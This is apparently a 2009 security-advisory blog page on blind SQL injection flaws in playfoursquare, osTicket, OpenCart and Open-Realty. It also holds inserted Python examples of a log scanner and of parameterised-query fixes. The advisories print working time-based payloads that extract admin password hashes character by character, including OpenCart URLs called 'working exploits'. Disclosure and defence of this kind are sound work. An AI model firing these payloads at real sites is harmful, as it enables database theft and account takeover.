Posts tagged: blind sqli

Aug 14 2009

Blind SQL Injection in playfoursquare.com

I stumbled upon a fun little SQL injection in playfoursquare the other day. I notified them and have not heard back, but it appears it has been addressed, so here are the details.

     It was possible to inject specially crafted SQL into the cookie "cookieCityID"
     which provides 

     If you set the cookie to the value below the query will take roughly 5-7
     seconds to return with this "True" condition (1=1).

     (SELECT IF(1=1,BENCHMARK(1000000,SHA1(1)),0))

     If you change the logic condition to 1=0 (False), the query returns
     immediately, demonstrating that blind SQL injection is possible.

     (SELECT IF(1=0,BENCHMARK(1000000,SHA1(1)),0))
III. REFERENCES
     [1] - http://playfoursquare.com

Copyright (c) 2009 nGenuity Information Services, LLC

Jun 26 2009

osTicket Admin Login Blind SQL Injection

nGenuity Information Services – Security Advisory

   Advisory ID: NGENUITY-2009-007 osTicket Admin Login Blind SQL Injection
   Application: osTicket v1.6 RC4
        Vendor: osTicket
Vendor website: http://www.osticket.com
        Author: Adam Baldwin (adam_baldwin@ngenuity-is.com)

  I. BACKGROUND
    "osTicket is a widely-used open source support ticket system. It seamlessly
    integrates inquiries created via email and web-based forms into a simple
    easy to use multi-user web interface. Easily manage, organize and archive
    all your support requests and responses in one place while providing your
    clients with accountability and responsiveness they deserve." [1]

  II. DETAILS
    osTicket prior to v1.6 RC5 fails to validate or escape staff usernames at the
    admin login, which allows an unauthenticated attacker to perform a blind SQL
    injection attack.

    The vendor has provided a new release v1.6 RC5 which addresses this vulnerability.
    They have also provided patching instructions [2] should you be unable to perform
    a full upgrade at this time.

    One sample attack string might look similar to the following:
    '+(SELECT IF(SUBSTRING(passwd,1,1)=CHAR(48),BENCHMARK(1000000,SHA1(1)),0) passwd
    FROM ost_staff where staff_id=1) and '1'='1
  III. REFERENCES
    [1] - http://www.osticket.com
    [2] - http://osticket.com/forums/project.php?issueid=118

  IV. VENDOR COMMUNICATION
    3.25.2009 - Vulnerability Discovery
    3.25.2009 - Vendor notification & initial vendor response
    6.26.2009 - Vendor releases fix in osTicket v1.6 RC5 

Copyright (c) 2009 nGenuity Information Services, LLC

May 12 2009

NGENUITY-2009-005 OpenCart re-visited, exploit included

I was recently asked to take down the OpenCart advisory as it was stated the information provided was not verified. Even though I was not able to exploit a portion of the advisory, I’m of the opinion that it should still be published. I cannot be so ignorant as to think that, just because I can’t, somebody else can’t.

Despite that belief, I published only the verifiable details and provided the details of the other “potential” attack vectors to the vendor, who took that to mean that I had not verified any of it. I politely provided evidence that the original advisory was verifiably exploitable, and I also provided proof that the other, non-verified piece I had given them was exploitable.

Since these vulnerabilities were fixed a while ago, here are a couple of examples of working exploits. By measuring the time it takes for a query to execute, we can guess the characters of the password hash one at a time until we know the full value. The same technique can be used to pull out any data in the database that the OpenCart application's database user has been granted access to.

Order parameter example:
This statement takes time to execute
http://example.com/index.php?route=product/category&path=18&sort=p.price&order=ASC,(SELECT
IF(SUBSTRING(password,1,1)=CHAR(97),BENCHMARK(100000,SHA1(1)),0)
password FROM user WHERE username=CHAR(97,100,109,105,110))

This statement returns almost immediately, as the first character is obviously not CHAR(00):
http://example.com/index.php?route=product/category&path=18&sort=p.price&order=ASC,(SELECT
IF(SUBSTRING(password,1,1)=CHAR(00),BENCHMARK(100000,SHA1(1)),0)
password FROM user WHERE username=CHAR(97,100,109,105,110))

Sort parameter example:
The same attack using a different injection point, not previously released:
http://example.com/index.php?route=product/category&path=18&sort=p.price&sort=(SELECT
%20IF(SUBSTRING(password,1,1)=CHAR(97),BENCHMARK(1000000,SHA1(1)),0)%20password
%20FROM%20user%20WHERE%20username=CHAR(97,100,109,105,110))--
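As an added defensive example (not code from the original posts), the following Python scans constructed access-log lines for the time-based blind SQL injection pattern the posts above rely on, covering both the OpenCart "order"/"sort" URL parameters and the playfoursquare "cookieCityID" cookie: each value is URL-decoded, checked for an IF() wrapped around BENCHMARK() (or SLEEP()), and tagged with whether the recorded response time is in the slow range the posts report. The log layout, the slowness threshold and the sample lines are assumptions constructed for the example.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Primitives used for time-based blind SQLi: the truth of a condition is leaked
# through response time by wrapping BENCHMARK() (or SLEEP()) in an IF().
TIME_PRIMITIVE = re.compile(r"\b(?:BENCHMARK|SLEEP)\s*\(", re.IGNORECASE)
CONDITIONAL = re.compile(r"\bIF\s*\(", re.IGNORECASE)
SLOW_SECONDS = 2.0  # assumed threshold; the posts report 5-7 s for BENCHMARK(1000000,SHA1(1))

# Assumed log layout: <ip> <request_time_seconds> "<method> <url>" "<Cookie header>"
LOG_LINE = re.compile(r'^(?P<ip>\S+) (?P<secs>[\d.]+) "(?P<method>\S+) (?P<url>\S+)" "(?P<cookie>[^"]*)"$')

def decoded_values(url, cookie_header):
    """Yield (location, decoded value) for every query parameter and cookie."""
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        yield f"query:{name}", value            # parse_qsl already percent/plus-decodes
    for pair in cookie_header.split(";"):
        if "=" in pair:
            name, value = pair.split("=", 1)
            yield f"cookie:{name.strip()}", unquote_plus(value)

def classify(line):
    """Return a finding dict for a suspicious line, or None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    hits = [where for where, value in decoded_values(m["url"], m["cookie"])
            if TIME_PRIMITIVE.search(value) and CONDITIONAL.search(value)]
    if not hits:
        return None
    return {"ip": m["ip"], "params": hits, "slow": float(m["secs"]) >= SLOW_SECONDS}

# Constructed sample lines (not real traffic); payload shapes follow the posts above.
SAMPLE_LOG = [
    '203.0.113.5 0.012 "GET /index.php?route=product/category&path=18&sort=p.price&order=ASC" "cookieCityID=3"',
    '203.0.113.7 6.210 "GET /index.php?route=product/category&path=18&sort=p.price'
    '&order=ASC,(SELECT+IF(SUBSTRING(password,1,1)=CHAR(97),BENCHMARK(100000,SHA1(1)),0)'
    '+password+FROM+user+WHERE+username=CHAR(97,100,109,105,110))" ""',
    '203.0.113.9 0.020 "GET /venues" "cookieCityID=(SELECT%20IF(1%3D0%2CBENCHMARK(1000000%2CSHA1(1))%2C0))"',
]

def scan(lines):
    """Run classify() over a log and keep only the findings."""
    return [f for f in map(classify, lines) if f]
```

The third sample is the false branch (1=0) from the first post: the signature still fires even though the response was fast, which is why the match is on the decoded payload and the timing is only reported alongside it.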

Mar 10 2009

NGENUITY-2009-005 OpenCart Order By Blind SQL Injection

nGenuity Information Services – Security Advisory

   Advisory ID: NGENUITY-2009-005 - OpenCart Order By Blind SQL Injection
   Application: OpenCart 1.1.8
        Vendor: OpenCart
Vendor website: http://www.opencart.com
        Author: Adam Baldwin (adam_baldwin@ngenuity-is.com)
           BID: 34121

  I. BACKGROUND
     "OpenCart is an open source PHP-based online shopping cart system. A robust e-commerce
     solution for Internet merchants with the ability to create their own online business and
     participate in e-commerce at a minimal cost." [1]

 II. DETAILS
     A blind SQL injection vulnerability exists within OpenCart because the "order"
     URL parameter is not properly sanitized before it is used in the query's ORDER BY
     clause.

     This vulnerability can be exploited by an unauthenticated attacker, giving them the
     ability to read any data within the OpenCart database. This may include, but is not
     limited to, usernames, unsalted MD5 password hashes, and payment gateway credentials.
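As an added example (not code from OpenCart, osTicket or the advisories), the following Python shows the two fixes the osTicket and OpenCart advisories call for: the "order"/"sort" values end up in ORDER BY, where identifiers cannot be bound as statement parameters, so they are mapped onto a fixed whitelist; the staff username is a data value, so it is bound with a placeholder. The schema, whitelist and in-memory SQLite database are constructed for the demo.

```python
import sqlite3

# Constructed whitelist for the demo (not OpenCart's real schema): request values
# map onto fixed column names, and only two directions exist.
SORT_COLUMNS = {"p.price": "price", "p.name": "name"}
DIRECTIONS = {"ASC", "DESC"}

def build_order_by(sort, order):
    """ORDER BY takes identifiers, which drivers cannot bind as parameters, so the
    only safe option is to map request values onto a whitelist and reject the rest."""
    column = SORT_COLUMNS.get(sort)
    direction = order.upper()
    if column is None or direction not in DIRECTIONS:
        raise ValueError(f"rejected sort={sort!r} order={order!r}")
    return f"ORDER BY {column} {direction}"

def list_products(conn, sort, order):
    sql = "SELECT name, price FROM product " + build_order_by(sort, order)
    return conn.execute(sql).fetchall()

def staff_id_for(conn, username):
    """The username is data, not an identifier: bound with a placeholder it is sent
    separately from the SQL text and cannot alter the query structure."""
    row = conn.execute("SELECT staff_id FROM ost_staff WHERE username = ?", (username,)).fetchone()
    return row[0] if row else None

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE product (name TEXT, price REAL);
        INSERT INTO product VALUES ('mug', 8.5), ('lamp', 30.0), ('pen', 1.2);
        CREATE TABLE ost_staff (staff_id INTEGER, username TEXT, passwd TEXT);
        INSERT INTO ost_staff VALUES (1, 'admin', 'constructed-hash');
    """)
    return conn

def demo():
    conn = make_db()
    ordered = [name for name, _ in list_products(conn, "p.price", "desc")]
    # Injected ORDER BY values shaped like the advisories' are rejected before any SQL runs.
    rejected = 0
    for sort, order in [("p.price", "ASC,(SELECT 1)"), ("(SELECT 1)--", "ASC")]:
        try:
            list_products(conn, sort, order)
        except ValueError:
            rejected += 1
    # A quote-breaking username is looked up literally and simply matches no row.
    return ordered, rejected, staff_id_for(conn, "admin"), staff_id_for(conn, "' OR '1'='1")
```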
III. REFERENCES
     [1] - http://www.opencart.com

 IV. VENDOR COMMUNICATION
     3.10.2009 - Vulnerability Discovery
     3.10.2009 - Vendor Notification
     3.10.2009 - Vendor response stating that this is fixed in version 1.1.9
     3.15.2009 - Version 1.1.9 released.

Copyright (c) 2009 nGenuity Information Services, LLC

Jan 27 2009

NGENUITY-2009-002 – Open-Realty SQL Injection

nGenuity Information Services – Security Advisory

   Advisory ID: NGENUITY-2009-002
   Application: Open-Realty 2.5.5
        Vendor: Transparent Technologies, Inc.
Vendor website: http://www.transparent-tech.com/
        Author: Adam Baldwin (adam_baldwin@ngenuity-is.com)

  I. BACKGROUND
     "Open-Realty® is an open source web based real estate listing management
     application. It is intended to be both easy to setup and use. Written
     in PHP, Open-Realty® is designed to be a fast and flexible tool for
     your real estate website" [1]

 II. DETAILS
     A Blind SQL Injection vulnerability exists within Open-Realty that is
     exploitable by a user with admin or agent privileges.

     This vulnerability can be exploited by inserting specially crafted SQL
     into the edit form field in the image upload feature of Open-Realty.

     Successful exploitation of this vulnerability could result in extraction
     of data from the Open-Realty database.

III. VENDOR COMMUNICATION
     1.27.2009 - Version 2.5.6 has been released and addresses this vulnerability.

 IV. REFERENCES
     [1] - http://www.open-realty.org/

Copyright (c) 2008 nGenuity Information Services, LLC